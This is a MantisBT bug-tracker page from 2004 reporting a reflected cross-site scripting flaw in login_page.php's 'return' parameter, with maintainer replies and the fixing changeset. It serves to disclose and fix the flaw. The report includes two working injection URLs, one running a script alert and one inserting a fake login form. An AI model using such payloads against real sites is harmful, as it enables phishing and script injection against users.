View Issue Details

WikiRelated ChangesetsJump to Notes
IDProjectCategoryView StatusDate SubmittedLast Update
0004044mantisbtsecuritypublic2004-07-08 12:222016-05-26 13:51
Reporterjoxeanpiti Assigned Toint2str  
PriorityurgentSeveritymajorReproducibilityalways
Status closedResolutionfixed 
Product Version0.19.0a1 
Fixed in Version0.19.0a2 
Summary0004044: Cross Site Scripting Vulnerability
Description

I found a simple XSS vulnerability, but may be more.

Please try the following URL :

http://bugs.mantisbt.org/login_page.php?return=%22%3E%3Cscript%3Ealert('Hello')%3C/script%3E

or this

http://bugs.mantisbt.org/login_page.php?return=%22%3E%3Ch3%3ELogin,%20please.%20NOTE:%20This%20is%20the%20newest%20version%3C/h3%3Eusername:%3Cinput%20type=%22edit%22%20%3E%3Cbr%3Epassword:%3Cinput%20type=password%3E%3Cbr%3E%3Cinput%20type=submit%20onclick=javascript:alert('hi')%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E

Additional Information

It is easy to correct it. You need to correctly sanitize ALL the user parameters that are passed.

TagsNo tags attached.

Relationships

related to 0020956 closeddregad CVE-2016-5364: Reflected XSS inside manage_custom_field_edit_page.php 

Activities

vboctor

vboctor

2004-07-08 20:16

manager   ~0005945

This should be fixed in 0.19.0a2.
vboctor

vboctor

2004-07-08 20:25

manager   ~0005947

By the way, if you have a fix, please post it here. This will save us sometime.
joxeanpiti

joxeanpiti

2004-07-09 14:37

reporter   ~0005965

I don't have a fix, but it is "easy". You need to correctly sanitize the passed strings when you shows these strings.
int2str

int2str

2004-07-09 19:27

reporter   ~0005967

Checked in a fix for some obvious ones (including the one mentionen in the bug). A more thorough security strategy should be layed out for the future.

Related Changesets

MantisBT: master 8b7fcd3a

2004-07-09 20:29

int2str


Details Diff		 * Fix 0004044: Cross Site Scripting Vulnerability

git-svn-id: http://mantisbt.svn.sourceforge.net/svnroot/mantisbt/trunk@2679 <a class="text" href="/?p=mantisbt.git;a=object;h=f5dc347c">f5dc347c</a>-c33d-0410-90a0-b07cc1902cb9		 Affected Issues
0004044
mod - login.php Diff File
mod - manage_custom_field_delete.php Diff File
mod - login_cookie_test.php Diff File
mod - doc/ChangeLog Diff File
mod - login_page.php Diff File
mod - manage_custom_field_edit_page.php Diff File
mod - manage_custom_field_update.php Diff File